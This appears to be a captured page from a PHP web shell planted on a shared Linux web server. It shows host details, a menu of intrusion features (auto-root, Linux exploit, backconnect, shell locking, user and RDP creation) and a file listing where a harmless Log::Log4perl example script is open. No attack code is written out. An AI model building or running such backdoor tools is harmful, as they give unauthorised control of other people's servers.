Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
liblog-log4perl-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
benchmarks
[ DIR ]
drwxr-xr-x
L4pResurrectable.pm
181
B
-rw-r--r--
color
768
B
-rwxr-xr-x
dupe-warning.conf
329
B
-rw-r--r--
jabber.conf
591
B
-rw-r--r--
l4p-tmpl
1.8
KB
-rwxr-xr-x
log4j-file-append-java.conf
532
B
-rw-r--r--
log4j-file-append-perl.conf
534
B
-rw-r--r--
log4j-manual-1.conf
508
B
-rw-r--r--
log4j-manual-2.conf
479
B
-rw-r--r--
log4j-manual-3.conf
541
B
-rw-r--r--
log4j-utf8.conf
219
B
-rw-r--r--
newsyslog-test
945
B
-rwxr-xr-x
override_appender
2.2
KB
-rwxr-xr-x
prototype
781
B
-rwxr-xr-x
syslog.pl
1.49
KB
-rwxr-xr-x
yamlparser
2.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : prototype
#!/usr/bin/perl ########################################### # prototype -- use a Class::Prototyped appender # Mike Schilli, 2004 (m@perlmeister.com) ########################################### use warnings; use strict; use Class::Prototyped; my $class = Class::Prototyped->newPackage( "MyAppenders::Bulletizer", bullets => 1, log => sub { my($self, %params) = @_; print "*" x $self->bullets(), $params{message}; }, ); use Log::Log4perl qw(:easy); Log::Log4perl->init(\ q{ log4perl.logger = INFO, Bully log4perl.appender.Bully=MyAppenders::Bulletizer log4perl.appender.Bully.bullets=3 log4perl.appender.Bully.layout = PatternLayout log4perl.appender.Bully.layout.ConversionPattern=%m %n }); # ... prints: "***Boo!\n"; INFO "Boo!";
Close